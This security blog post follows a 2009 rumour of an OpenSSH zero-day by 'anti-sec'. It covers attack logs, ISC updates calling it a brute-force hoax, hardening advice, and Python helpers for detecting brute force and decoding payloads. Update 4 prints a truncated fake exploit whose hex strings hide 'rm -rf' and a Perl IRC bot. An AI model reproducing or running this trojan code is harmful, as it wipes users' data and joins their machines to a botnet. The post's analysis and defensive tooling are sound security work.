
Rumors are flying of an underground OpenSSH exploit. After some digging we find the tool name and its group:
“./0pen0wn” or “./openPWN”, by the hacker group called “anti-sec.” Check the commands below:
anti-sec:~/pwn/xpl# ./openPWN -h 66.96.220.213 -p 2222 -l=users.txt
[+] openPWN - anti-sec group
[+] Target: 66.96.220.213
[+] SSH Port: 2222
[+] List: users.txt
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
and:
anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.143.133 -p 22
[+] 0wn0wn - anti-sec group
[+] Target: 66.197.143.133
[+] SSH Port: 22
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
Two attack logs exist on the net with this supposed exploit, both by this group. The first is an attack on an Astalavista admin:
http://romeo.copyandpaste.info/txt/nowayout.txt
The second attack is the one the Internet Storm Center blogged about, which can be seen in its entirety here:
A Russian site has a play-by-play of the attack here:
A Belgian blog has this to say about it:
There has been a splash of OpenSSH attacks and scanning – even in Belgium – and nobody seems to know what and why. There are some rumors and there is some discussion over at the Internet Storm Center, but it is not all clear yet. The rumor is that a zero-day has been discovered for OLDER versions of OpenSSH. This means there is no patch – but you can upgrade, which will solve the issue.
I know it is a lot of work, but it is work that you have to do; otherwise there will be much more other work that you will have to do when you become the stupid victim of an announced attack.
Do the right thing. Upgrade to the latest versions.
PS: what is strange about the OpenSSH scans is that they are scanning a whole set of ports, not only the traditional ones. Maybe to find the diverting tactics (by choosing another port so as not to be found while scanning). It means they are smart, these guys.
Rumor tells us that Black Hat US may be the place where more information would be launched about this attack. That promises. It looks like this Black Hat conference will become a hell of a show…
Update 1:
ISC has a third update saying this:
We’ve received a few emails that lend credibility to the rumor, and we’ve received a few more that paint an interesting picture – that the reports are all part of a cover-up to hide another breach that was caused by a sysadmin’s mistake. What we are lacking is the actual exploit code. So if this is “for real”, would somebody slip us a copy and leave it under the door mat? (Actually, our contact form is the best place.) We won’t tell anybody where it came from, but it sure would put a lid on this story.
If you look at the first attack log, the ./0pen0wn script drops them into a jailshell which they have to escape to get at the box. This might give some insight into the exploit. They use a ./MichaelScofield script (a pun, because he’s a character in the TV series Prison Break) to get /bin/sh and go after passwords, etc.
sh-3.1$ ./MichaelScofield
[+] MichaelScofield - Prison Breaker / anti-sec group
[+] Grabbing environment variables...
SHELL=/usr/local/cpanel/bin/jailshell
[+] Injecting new shell..
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
SHELL=/bin/sh
Update 2 from ISC handler Bojan Zdrnja.
For the last couple of days we’ve been all witnesses of FUD surrounding a supposed 0-day exploit for OpenSSH skyrocketing.
At this moment, it definitely looks like we’re dealing with a hoax – even more, it’s not the first time someone said they have a 0-day exploit for SSH. So, let’s see some facts about this.
It appears that the whole story started after a post to the Full-Disclosure mailing list on the 4th of July (http://seclists.org/fulldisclosure/2009/Jul/0028.html). The post supposedly shows a hacker group using a 0-day exploit for SSH to compromise a server. After doing some research here, it appears that this is a long standing argument between two guys (or groups). One of our readers submitted the following URL address (http://flx.me/astahack2.txt), which shows another hack.
The “exploit” used in that file is a brute force attack for sure, as can be seen below:
anti-sec:~/pwn/xpl# ./openPWN -h 66.96.220.213 -p 2222 -l=users.txt
See the “-l” option? That supplies the list of users it will try to brute force.
Additionally, a bit below it even prints which user was hacked:
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
user: crownvip
uname: Linux srv01.webhostline.com 2.6.21.5-hostnoc-3.1.7-libata-grsec-32 #1 SMP Mon Feb 11 06:36:58 EST 2008 i686 i686 i386 GNU/Linux
Now, what has been posted on the Full-Disclosure list (the supposed exploit) looked like this:
anti-sec:~/pwn/xpl# ./0pen0wn -h xx.yy.143.133 -p 22
Same group, same server, same directory – different file name. Why didn’t they use the mighty 0-day first time? They brute forced into the server and then had to jail break.
This looks very much like a hoax to me – and this is the only evidence we have about a 0-day? A post from an anonymous e-mail address (hushmail) to the Full-Disclosure mailing list (which, we all have to admit, isn’t the best source of verified information)? And this was even enough for some web hosting companies to *shut down* their SSH service? I find this unbelievable. Finally, OpenSSH developers would probably agree with me – one of the developers sent an e-mail to the Openssh-unix-dev mailing list (http://lwn.net/Articles/340483/) also stating the obvious.
So, I’d like to ask everyone not to spread the FUD anymore. Every piece of evidence we received so far points only to brute force attacks on SSH servers (which have been around for years!). Do keep an eye on your server and install all patches. We will post more information if we receive it, but until then I think there was enough of this FUD.
Update 3 (jeez, I know)
It seems everyone’s agreed it’s a new brute-force tool.
The director of the ISC said that the vuln had merit; then Bojan, an ISC handler and pentester, commented about FUD. In the meantime ImageShack was pwned by the same group.
I don’t wanna spread FUD, but I’d suggest following these steps given by ISC readers:
- Make sure SSH is updated
- Audit your own SSH passwords
- Lock down SSH at the hardware firewall level so connections come only from authorized IP addresses
- Use hosts.deny or an iptables active response
- Use a port-knocking system, especially on the SSH service
- Run PortSentry on port 22 while the OpenSSH server listens on another port, and ban anything that connects to port 22 via PortSentry and iptables
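As an added example (not from the page or from ISC), a Python detector that runs over constructed sshd log lines and flags the pattern the attack logs above show: many failed password logins from one source spread across a list of usernames, the way a tool fed "-l users.txt" behaves. It then renders the flagged sources as hosts.deny lines for the active-response step; the addresses, host name and thresholds are placeholders I chose.

```python
import re
from collections import defaultdict

# Syslog-style sshd lines of the kind a password guesser working through a user list
# (the "-l users.txt" in the logs above) leaves in auth.log. Constructed sample data;
# the addresses and host name are placeholders, not real systems.
SAMPLE_LOG = """\
Jul  8 03:12:01 srv01 sshd[2231]: Failed password for invalid user admin from 192.0.2.10 port 40122 ssh2
Jul  8 03:12:03 srv01 sshd[2233]: Failed password for invalid user test from 192.0.2.10 port 40130 ssh2
Jul  8 03:12:05 srv01 sshd[2235]: Failed password for root from 192.0.2.10 port 40141 ssh2
Jul  8 03:12:07 srv01 sshd[2237]: Failed password for invalid user oracle from 192.0.2.10 port 40150 ssh2
Jul  8 03:12:09 srv01 sshd[2239]: Accepted password for crownvip from 192.0.2.10 port 40160 ssh2
Jul  8 03:15:40 srv01 sshd[2301]: Failed password for alice from 198.51.100.7 port 50011 ssh2
Jul  8 03:15:44 srv01 sshd[2303]: Accepted publickey for alice from 198.51.100.7 port 50012 ssh2
"""

LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) (?P<method>\w+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+")

def parse_auth_log(text):
    """Yield (result, method, user, ip) for every sshd authentication line recognised."""
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            yield m.group("result"), m.group("method"), m.group("user"), m.group("ip")

def find_bruteforce_sources(text, min_failures=3, min_users=2):
    """Flag sources with >= min_failures failed logins over >= min_users accounts, and
    record any password login accepted from them afterwards (a guessed account)."""
    fails, success = defaultdict(list), defaultdict(list)
    for result, method, user, ip in parse_auth_log(text):
        if result == "Failed":
            fails[ip].append(user)
        elif method == "password" and fails[ip]:
            success[ip].append(user)
    return {ip: {"failures": len(users), "users": sorted(set(users)),
                 "success_after": success[ip]}
            for ip, users in fails.items()
            if len(users) >= min_failures and len(set(users)) >= min_users}

def hosts_deny_lines(report):
    """Render flagged sources as TCP-wrapper lines for /etc/hosts.deny."""
    return ["sshd: %s" % ip for ip in sorted(report)]

if __name__ == "__main__":
    report = find_bruteforce_sources(SAMPLE_LOG)
    print(report)
    print("\n".join(hosts_deny_lines(report)))
```

A source that fails only once against a single account (the second address in the sample) stays below the thresholds and is not blocked.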
Bottom Line:
It may just be a new type of brute-force tool, it may be something else; best be prepared anyway =)
Update 4
Fake code captured from the SANS NetWars competition: it connects you to an IRC channel AND reformats your drive!! DO NOT RUN:
/* 0pen0wn.c by anti-sec group
* ---------------------------
* OpenSSH <= 5.2 REMOTE (r00t) EXPLOIT.
*
*
* Takes advantage of an off-by-one
* bug in mapped authentication space on system
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#define VALID_RANGE 0xb44ffe00
#define build_frem(x,y,a,b,c) a##c##a##x##y##b
char jmpcode[] =
"\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"
"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";
char shellcode[] =
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
... Truncated for your protection
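As an added example (not code from the page or from anti-sec), a small Python checker that pulls the char arrays out of that C source and decodes their escape sequences, so the strings can be read before anything is compiled. The fragment of 0pen0wn.c embedded below is copied from the listing above (the shellcode literal is only its truncated start); the red-flag list and the function names are my own.

```python
import re

# Fragment of the fake 0pen0wn.c shown in Update 4, copied as it appears on this page
# (the shellcode literal is only its truncated start). It is treated as data here and
# never compiled or run.
FAKE_EXPLOIT_SRC = r'''
char jmpcode[] =
"\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"
"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";
char shellcode[] =
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65";
'''

# char NAME[] = "lit" "lit" ... ;  adjacent literals concatenate, as the C compiler would
ARRAY_RE = re.compile(r'char\s+(\w+)\s*\[\]\s*=\s*((?:"(?:[^"\\]|\\.)*"\s*)+);')
LITERAL_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
ESCAPE_RE = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})|\\(.)')
SIMPLE = {"n": "\n", "t": "\t", "r": "\r", "a": "\a", "\\": "\\", '"': '"', "'": "'"}

def decode_c_literal(body):
    """Expand \\xHH, octal and simple backslash escapes of one C string literal body."""
    def sub(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        if m.group(2) is not None:
            return chr(int(m.group(2), 8))
        return SIMPLE.get(m.group(3), m.group(3))
    return ESCAPE_RE.sub(sub, body)

def extract_string_arrays(src):
    """Return {array_name: decoded text} for every char NAME[] = "..."; in src."""
    return {name: "".join(decode_c_literal(b) for b in LITERAL_RE.findall(lits))
            for name, lits in ARRAY_RE.findall(src)}

# Content a "remote root exploit" has no business carrying; defensive heuristics only.
RED_FLAGS = [("rm -rf", "destructive shell command"),
             ("#!/", "embedded script (shebang)"),
             ("JOIN ", "IRC channel join")]

def audit_payloads(src):
    """Map array name -> descriptions of the red flags found in its decoded content."""
    return {name: [why for pat, why in RED_FLAGS if pat in text]
            for name, text in extract_string_arrays(src).items()}

if __name__ == "__main__":
    flags = audit_payloads(FAKE_EXPLOIT_SRC)
    for name, text in extract_string_arrays(FAKE_EXPLOIT_SRC).items():
        print("%s -> %r  %s" % (name, text, flags[name]))
```

Decoding jmpcode yields the "rm -rf" command the first comment below describes, and the shellcode opens with a Perl shebang rather than anything an OpenSSH exploit would need.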

#1 by Yujin - July 14th, 2009 at 14:49
Code in Update 4 will do an “rm -rf /” if you run it. I compiled and ran the code, and after that the computer did not boot. I understand why some say never use root. As a RedHat user, I always like to log in as root.
#2 by xanda - July 19th, 2009 at 09:16
@Yujin make sure you check the payload before running any exploit after this.
For the exploit you’ve run, maybe you can see the clearer payload here: http://blog.xanda.org/?p=851